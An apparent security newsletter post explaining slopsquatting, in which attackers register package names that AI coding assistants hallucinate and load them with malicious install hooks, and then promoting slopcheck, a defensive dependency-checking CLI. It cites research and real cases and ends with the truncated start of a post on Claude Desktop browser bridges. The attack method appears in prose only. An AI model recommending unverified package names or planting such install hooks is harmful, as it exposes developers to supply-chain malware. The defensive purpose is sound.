class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> AI coding assistants recommend packages that don&#8217;t exist. Attackers claim those hallucinated names on PyPI and npm, load them with malware, and wait for the copy-paste. Nearly 20% of AI-generated code samples reference fake packages. 43% of those fakes repeat on every single run. The attack surface is predictable, scalable, and already burning through the wild. slopcheck blocks it at the install boundary.</p><p><a href="https://substack.com/@karenspinner1">Karen Spinner</a> is joining me for this one. She&#8217;s taking slopcheck out for a spin and showing you what it looks like from the chair of someone who codes with AI assistants daily. Her two sections live inside the piece. I handle the attack chain.</p><h2>What Is Slopsquatting</h2><p>Package managers are the plumbing nobody wants to write twice. You run <code>pip install something</code>, the package drops into your project, off you go. The whole ecosystem runs on trust: you type a name, you get the code, you ship.</p><p>Now wire an AI coding assistant into the workflow. You ask Claude or Copilot for code that talks to a new API. It spits out <code>pip install huggingface-cli</code> alongside a working snippet. Most devs trust the recommendation. They run the command.</p><p>Here&#8217;s the problem. The AI never checked whether that package exists on the registry. It predicted a plausible-sounding name from statistical patterns in its training data. Sometimes the name is real. Sometimes it&#8217;s a ghost.</p><p>Slopsquatting is what happens when an attacker claims that ghost first. Register the hallucinated name on the public registry. Wire up a functional-looking README and version history. Drop a malicious install hook into the setup script. Wait.</p><p>The dev who copy-pastes the AI&#8217;s install command runs the attacker&#8217;s payload the moment <code>pip install</code> finishes. Seth Larson of the Python Software Foundation named the attack in April 2025. Slop, as in low-quality AI output. Squatting, as in claiming a name for hostile purposes. It sits inside a broader pattern of <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">AI coding tool failures we&#8217;ve already walked through</a>, alongside hardcoded secrets and broken auth.</p><h2>Why AI Coding Tools Hallucinate Packages</h2><p>Typosquatting waits for a human to mistype a name. The attacker registers `<code>reqeusts`</code>, hopes someone fat-fingers the real one, and lives off the misfires. Slopsquatting skips the human error entirely. The AI generates the mistake, the attacker harvests it.</p><p>Sixteen code-generating models tested across 576,000 samples in the 2025 USENIX Security paper <em>We Have a Package for You</em>. Nearly 20% of AI-generated code referenced packages that don&#8217;t exist. The fakes broke into three patterns: real packages mashed together (think <code>express-mongoose</code>), typo variants of real names, and pure fabrications. Over 205,000 unique hallucinated package names across all runs. That&#8217;s a shopping list.</p><p>Here&#8217;s the part that turns this from a curiosity into a weapon. Same prompt, ten runs, same model: 43% of hallucinated names appeared on every single run. An attacker doesn&#8217;t need to guess. Run a few dozen prompts against a popular model, harvest the names that keep showing up, register them on PyPI or npm before anyone else. The hallucinations are targetable.</p><p>Cross-ecosystem bleed makes it worse. Almost 9% of Python names the models hallucinated turned out to be valid JavaScript packages, and vice versa. A model thinks it&#8217;s recommending a Python library, names something that exists only in npm, and the dev runs <code>pip install</code> on a ghost. Free opening in the wrong registry.</p><p>This already works outside the lab. Researcher Bar Lanyado registered <code>huggingface-cli</code> as an empty package on PyPI after watching GPT recommend it. 30,000 downloads in three months. Alibaba copy-pasted the fake install command straight into a public repo&#8217;s README.</p><p>In January 2026, a hallucinated npm package called <code>react-codeshift</code> spread through 237 repositories via AI-generated agent skill files with nobody deliberately planting it. Slopsquatting now <a href="https://www.toxsec.com/p/distillation-raids-slopsquatting">sits alongside model distillation raids and indirect prompt injection</a> as one of the three attack vectors carving through the 2026 AI stack. Both test cases above were caught by researchers. Next time, maybe not.</p><p>Vibe coding makes the blast radius worse. Hand the entire dependency list to the model with fewer eyes on verification, and every hallucinated name is a live wire. Higher temperature pushes hallucination rates up. Creative means more slop.</p><p>Ghost packages are just one failure mode among many. <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">Hardcoded secrets in AI-generated code</a> ship the credentials. The registry is the next door over.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5Z3Y!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 424w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 848w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1272w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png" width="1174" height="906" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:906,&quot;width&quot;:1174,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:83781,&quot;alt&quot;:&quot;Slopsquatting hallucination rates from USENIX 2025 research &#8212; bar chart showing 20% of AI-generated code references fake packages, 43% of hallucinations repeat across runs, 9% cross-ecosystem bleed.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194702932?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Slopsquatting hallucination rates from USENIX 2025 research &#8212; bar chart showing 20% of AI-generated code references fake packages, 43% of hallucinations repeat across runs, 9% cross-ecosystem bleed." title="Slopsquatting hallucination rates from USENIX 2025 research &#8212; bar chart showing 20% of AI-generated code references fake packages, 43% of hallucinations repeat across runs, 9% cross-ecosystem bleed." srcset="https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 424w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 848w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1272w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>So what do you actually do about Slopsquatting?</h2><p>That&#8217;s where slopcheck comes in. It&#8217;s an open-source CLI I built to sit at the install boundary and check every dependency name against the real registry before pip or npm ever fires. If the package doesn&#8217;t exist, it blocks. If it looks sketchy (brand new, zero downloads, hallucination-pattern naming), it flags. If it&#8217;s clean, it lets you through. Seven ecosystems, runs in under a second, MIT licensed.</p><p>Full technical breakdown is coming up after Karen&#8217;s section. But first, she took it for a spin on her own projects. Here&#8217;s what that looked like from the chair of someone who actually has to trust the install command.</p><div><hr></div><p><em>Karen Spinner, taking slopcheck for a spin:</em></p><h3>Catching AI Package Hallucinations Before They Bite</h3><p>When I use vibe coding tools like Claude Code, my overall approach is &#8220;trust but verify.&#8221; I personally look at the code and make sure I know what it&#8217;s doing before I ship it. And I always keep security in mind as I build.</p><p>Coding agents are designed to do what&#8217;s fast and expedient, not necessarily what&#8217;s best for you and your users. And slopsquatting exploits this behavior. If AI agents would look up tool names instead of guessing, it wouldn&#8217;t exist.</p><p>But since it does exist, the best approach is to check package names before AI installs them in your project. Doing this manually can be a hassle and force you to switch context in the middle of your building session.</p><p>Chris&#8217; slopcheck tool is a convenient way to automate this process. It reads your dependency files as text and checks each package against the real registries over HTTP.</p><p><strong>Setting it up</strong></p><p>While slopcheck is a Python CLI, it scans across ecosystems, PyPI, npm, crates.io, Go, RubyGems, Maven, and Packagist. I installed it one of my Python virtual environments in about ten seconds:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;8fb40d37-56f7-4714-aae2-229abe72a2a4&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">pip install slopcheck
</code></pre></div><p><strong>Running it on a production project</strong></p><p>I pointed it at the requirements.txt for Future Scan, a Django project I maintain which includes 100 Python dependencies, a mix of hand-picked packages and transitive deps. The command I used was:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;16e894b7-cb95-45eb-8086-026e939bc849&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">slopcheck scan requirements.txt
</code></pre></div><p>It checked all 100 packages in parallel against PyPI and came back in a few seconds. The output is color-coded and easy to scan:</p><ul><li><p><strong>[OK]</strong> &#8212; Package exists, looks legitimate. 98 of my 100 deps got this.</p></li><li><p><strong>[SUS]</strong> &#8212; Package exists but something about it raised a flag. I got two of these.</p></li><li><p><strong>[SLOP]</strong> &#8212; Package doesn&#8217;t exist in the registry at all. This is the real danger zone; if an LLM told you to install it, someone could register malware under that name tomorrow. (I didn&#8217;t get any of these on this project, which was reassuring.)</p></li></ul><p><strong>The false positives were easy to sort out</strong></p><p>Both of my [SUS] flags were Levenshtein near-misses. Slopcheck thought they might be typosquats of more popular packages:</p><p><code>hiredis</code> got flagged as suspiciously close to <code>redis</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;e1501ed9-7f0e-455b-9418-ee5e36af787c&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">[SUS] hiredis (pypi)
&gt; Suspiciously close to 'redis'. Could be a typosquat.
? Did you mean: redis
</code></pre></div><p><code>numba</code> got flagged as suspiciously close to <code>numpy</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;5f773f21-d107-40aa-85bd-df645f0bab2a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">[SUS] numba (pypi)
&gt; Suspiciously close to 'numpy'. Could be a typosquat.
? Did you mean: numpy
</code></pre></div><p>Both are completely legitimate: <code>hiredis</code> is the official C parser for redis-py, and <code>numba</code> is Anaconda&#8217;s JIT compiler with tens of millions of monthly downloads.</p><p>It also added informational notes on packages like <code>python-dateutil</code> and <code>python-dotenv</code>, calling out the <code>python-*</code> prefix as a &#8220;classic LLM naming pattern&#8221; but acknowledging both are established.</p><p><strong>Did I use it again?</strong></p><p>As you can see in the demo, I used it to check my packages.json file in CarouselBot, a React project.</p><p>I&#8217;ve also added a note for Claude to run slopcheck before it installs new packages and alert me to anything, well, SUS.</p><p>One more hassle I can cross off my list!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sNut!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sNut!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 424w, https://substackcdn.com/image/fetch/$s_!sNut!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 848w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1272w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sNut!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png" width="1165" height="746" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:746,&quot;width&quot;:1165,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:70223,&quot;alt&quot;:&quot;slopcheck Scan: 100 Django Deps Horizontal bar of Karen's real-world scan: 98 OK, 2 SUS, 0 SLOP. The practical \&quot;what it looks like in the chair\&quot; chart.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194702932?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="slopcheck Scan: 100 Django Deps Horizontal bar of Karen's real-world scan: 98 OK, 2 SUS, 0 SLOP. The practical &quot;what it looks like in the chair&quot; chart." title="slopcheck Scan: 100 Django Deps Horizontal bar of Karen's real-world scan: 98 OK, 2 SUS, 0 SLOP. The practical &quot;what it looks like in the chair&quot; chart." srcset="https://substackcdn.com/image/fetch/$s_!sNut!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 424w, https://substackcdn.com/image/fetch/$s_!sNut!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 848w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1272w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>More from Karen.</strong> <a href="https://wonderingaboutai.substack.com/">Wondering About AI</a> covers agentic tools from the builder&#8217;s chair. Subscribe for the user-side perspective security folks keep forgetting exists.</p><div><hr></div><p><strong>Back to Tox.</strong></p><h2>How slopcheck Catches Hallucinated Packages</h2><p>slopcheck is a free, <a href="https://github.com/0xToxSec/slopcheck">open-source CLI</a> that queries every dependency in your project against the live package registry before anything touches your environment. Seven ecosystems out of the box: PyPI, npm, crates.io, Go modules, RubyGems, Maven and Gradle, and Packagist.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;cef7985b-f453-4a50-9455-034e006533e9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># one and done
pip install slopcheck &amp;&amp; slopcheck init
</code></pre></div><p>The detection logic layers multiple signals instead of trusting a single flag:</p><ul><li><p><strong>[SLOP]</strong> is the hard block. The name doesn&#8217;t resolve on the registry at all. Do not install.</p></li><li><p><strong>[SUS]</strong> is the yellow light. The package exists but the profile is off: registered in the last seven days, fewer than 100 total downloads, hallucination-pattern naming like <code>{popular-lib}-helper</code> or <code>{real-pkg}-utils</code>, or no source repository link. Look before you install.</p></li><li><p><strong>[OK]</strong> is clean. Established, downloaded, linked to a real repo.</p></li></ul><p>slopcheck also runs a Levenshtein distance check against the most popular packages in each ecosystem, which catches classic typosquats with a &#8220;did you mean?&#8221; correction. Someone aims for <code>requests</code>, gets `<code>reqeusts`</code>, slopcheck flags it before pip runs.</p><p>The modes that matter day to day:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;bc245569-0daf-49d4-babb-9beb7c52b1d6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># auto-detect every dep file in the project
slopcheck .

# safe install: verify first, only clean deps reach pip
slopcheck install flask requests sketchy-package

# auto-remove hallucinated packages from dep files
slopcheck . --fix

# pre-commit git hook that blocks slop before every commit
slopcheck init
</code></pre></div><p>Safe install mode wraps your real package manager. It checks every name, blocks anything flagged as slop, skips suspicious packages unless you pass <code>--force</code>, and only hands the clean list to pip or npm once the gate is clear. The <code>--fix</code> flag auto-removes hallucinated packages from your dep files, commenting them out with <code># [slopcheck] removed:</code> so the kill history stays visible in the diff.</p><p>Internal packages that won&#8217;t exist on public registries? <code>.slopcheck</code> allowlists handle it. CI pipelines? <code>--json</code> output is machine-readable, and a GitHub Action scans every PR that touches dependency files. Slop detected fails the check and drops a report comment directly on the PR. Block at merge time, not at deploy time.</p><p>slopcheck is MIT licensed. <code>pip install slopcheck</code> and you&#8217;re running. Scans a full project in about a second on most hardware. The code lives on GitHub if you want to read it, fork it, or tear it apart.</p><p>The registry is the trust boundary most devs never think about, the same way nobody thought about model weights until <a href="https://www.toxsec.com/p/local-model-security-gemma-4">pickle files on Hugging Face started shipping backdoors</a>. Every place AI output touches a public ecosystem is a new attack surface.</p><div><hr></div><p><em>Karen, closing us out:</em></p><h3>A note for fellow builders</h3><p>I mostly build tools because I love making my life easier for me and my customers. (I&#8217;m currently working on a few custom development projects in addition to <a href="https://www.carouselbot.app/about">CarouselBot</a> and <a href="https://futurescan.org/">Future Scan</a>.)</p><p>But I recognize that security, while perhaps less exciting for me, is important too. If something goes wrong, it can damage relationships and businesses.</p><p>While slopsquatting is just one of many security issues all of us building with AI need to consider, it&#8217;s also one of the easiest to manage once you&#8217;re aware of it&#8230;and, especially if you use slopcheck.</p><div><hr></div><p><strong>Follow Karen.</strong> Catch her on Substack at <a href="https://substack.com/@karenspinner1">@karenspinner1</a> or subscribe directly to Wondering About AI. </p><div class="embedded-publication-wrap" data-attrs="{&quot;id&quot;:5597038,&quot;name&quot;:&quot;Wondering About AI&quot;,&quot;logo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!B3X6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F721dac90-0e32-4c6d-a6bc-172d3fab26e6_1080x1080.png&quot;,&quot;base_url&quot;:&quot;https://wonderingaboutai.substack.com&quot;,&quot;hero_text&quot;:&quot;I build tools with Claude Code and other AI platforms and share exactly what works (and what flames out). Now I'm helping other vibe coders break through barriers and get their projects done.&quot;,&quot;author_name&quot;:&quot;Karen Spinner&quot;,&quot;show_subscribe&quot;:true,&quot;logo_bg_color&quot;:&quot;#ffffff&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="EmbeddedPublicationToDOMWithSubscribe"><div class="embedded-publication show-subscribe"><a class="embedded-publication-link-part" native="true" href="https://wonderingaboutai.substack.com?utm_source=substack&amp;utm_campaign=publication_embed&amp;utm_medium=web"><img class="embedded-publication-logo" src="https://substackcdn.com/image/fetch/$s_!B3X6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F721dac90-0e32-4c6d-a6bc-172d3fab26e6_1080x1080.png" width="56" height="56" style="background-color: rgb(255, 255, 255);"><span class="embedded-publication-name">Wondering About AI</span><div class="embedded-publication-hero-text">I build tools with Claude Code and other AI platforms and share exactly what works (and what flames out). Now I'm helping other vibe coders break through barriers and get their projects done.</div><div class="embedded-publication-author-name">By Karen Spinner</div></a><form class="embedded-publication-subscribe" method="GET" action="https://wonderingaboutai.substack.com/subscribe?"><input type="hidden" name="source" value="publication-embed"><input type="hidden" name="autoSubmit" value="true"><input type="email" class="email-input" name="email" placeholder="Type your email..."><input type="submit" class="button primary" value="Subscribe"></form></div></div><h2>Frequently Asked Questions</h2><h3>What&#8217;s the difference between slopsquatting and typosquatting?</h3><p>Typosquatting waits for a human to mistype a package name. The attacker registers <code>reqeusts</code> and lives off the fat-fingers. Slopsquatting skips the human error entirely. The AI hallucinates the name, the attacker pre-registers it, and the dev copy-pastes the install command without thinking. Registries run collision detection for names similar to existing packages, but hallucinated names are brand-new strings with no collision. The attack scales because the hallucinations are predictable across prompts, models, and ecosystems.</p><h3>Has slopsquatting been used in a confirmed cyberattack?</h3><p>No large-scale breach has been publicly pinned to slopsquatting as of 2026. The precursors are real. A harmless test package under the hallucinated name <code>huggingface-cli</code> pulled 30,000 downloads in three months. An npm package called <code>react-codeshift</code> spread through 237 repositories via AI-generated agent infrastructure with nobody planting it deliberately. The gap between proof-of-concept and weaponized supply chain attack is a free registry account and a malicious install hook. That gap is small.</p><h3>How does slopcheck work across multiple ecosystems?</h3><p>slopcheck parses dependency files automatically: <code>requirements.txt</code> and <code>pyproject.toml</code> for Python, <code>package.json</code> for JavaScript, <code>Cargo.toml</code> for Rust, <code>go.mod</code> for Go, <code>Gemfile</code> for Ruby, <code>pom.xml</code> and <code>build.gradle</code> for Java, and <code>composer.json</code> for PHP. Every dependency gets checked against its ecosystem&#8217;s live registry. The tool runs checks in parallel with ten workers by default, so scanning a full project typically finishes in under a second. Package managers aren&#8217;t invoked until the verification gate is clear.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p><p>Karen Spinner writes Wondering About AI, where she covers agentic AI tools from the chair of someone who uses them daily. She brings the user perspective security researchers forget exists.</p>]]></content:encoded></item><item><title><![CDATA[Is Claude Code Secretly Installing Spyware?]]></title><description><![CDATA[A researcher caught Claude Desktop installing browser bridges silently. Plus the MCP RCE Anthropic won&#8217;t patch.]]></description><link>https://www.toxsec.com/p/is-claude-code-spyware</link><guid isPermaLink="false">https://www.toxsec.com/p/is-claude-code-spyware</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 26 Apr 2026 18:09:39 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/195466711/ae6bd57b08b8db64cab2a83be4e39183.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> Claude Code is not spyware. But Claude Desktop quietly drops a Native Messaging bridge into seven browsers without asking. Anthropic shrugged. Same week, they shrugged on an MCP RCE exposing 200,000 servers. Same week, a Discord group ran their Mythos model for a month undetected. One pattern, three receipts.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>So Is Claude Code Spyware or What?</h2><p>Quick answer: no. The headline is sticky for a reason though.</p><p>April 18. Privacy researcher Alexander Hanff is debugging an unrelated Native Messaging helper on a clean Mac when he finds a manifest file he never installed: <code>com.anthropic.claude_browser_extension.json</code>. It&#8217;s sitting in his 